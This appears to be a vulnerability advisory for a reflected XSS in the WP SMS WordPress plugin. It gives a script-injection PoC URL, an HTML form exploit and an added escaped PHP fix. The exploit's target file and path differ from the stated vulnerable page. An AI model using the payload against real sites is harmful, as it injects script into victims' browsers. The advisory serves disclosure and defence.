############################################
#Exploit Title : WP SMS "page" parameter XSS
#Vendor Homepage : http://wordpress.org/plugins/wp-sms/
#Category : Webapps
#Date : 20.9.2017
#Tested On : Windows, Kali Linux
#Author : Ali Alizadeh asl
#Dork: N/A
#Telegram: @OverFear
############################################
Description:
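Reflected XSS: the "page" request parameter is echoed into the response without escaping, which allows an attacker to run JavaScript code in the browser of a user who opens a crafted link.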
==================
Vulnerable webpage :
http://localhost/wordpress/wp-content/plugins/wp-sms/includes/templates/subscribe/groups.php
==================
Vulnerable Source :
Line 10: echo $_REQUEST['page']
==================
PoC:
http://localhost/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/groups.php?page=<script>alert('XSS!')</script>
==================
Exploit :
<html>
<form action="http://localhost:8080/wordpress/wp-content/plugins/wp-sms-master/includes/templates/subscribe/subscribes.php" method="get">
<input type="text" name="page">
<input type="submit" value="XSS">
</form>
</html>
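==================
A hardened form of the line 10 echo, as an added example that is not part of the original advisory or the plugin's own code. The helper name `wpsms_example_page_field`, the slug allow-list, the sample slug and the hidden-input output context are assumptions; `esc_attr()` is the WordPress escaping function, with a fallback so the file runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. In the real template the first
// statement would be `defined('ABSPATH') || exit;` so that the file cannot be
// requested directly; it is left as a comment here so this file runs under
// the PHP CLI.

// Outside WordPress esc_attr() is undefined; this fallback has the same
// escaping intent and keeps the example self-contained.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Hypothetical helper replacing `echo $_REQUEST['page']`.
function wpsms_example_page_field(array $request): string {
    $page = $request['page'] ?? '';
    // `?page[]=x` arrives as an array; treat any non-string as empty.
    if (!is_string($page)) {
        $page = '';
    }
    // Assumption: the value is an admin page slug, so allow-list its characters.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        $page = '';
    }
    // Escape for the output context (assumed: an HTML attribute value).
    return '<input type="hidden" name="page" value="' . esc_attr($page) . '" />';
}

// Constructed sample requests.
$samples = [
    ['page' => 'wp-sms-subscribers'],
    ['page' => "<script>alert('XSS!')</script>"],
    ['page' => ['nested']],
    [],
];
foreach ($samples as $request) {
    echo wpsms_example_page_field($request), PHP_EOL;
}
```

If the value is printed as element text rather than inside an attribute, `esc_html()` is the matching WordPress function.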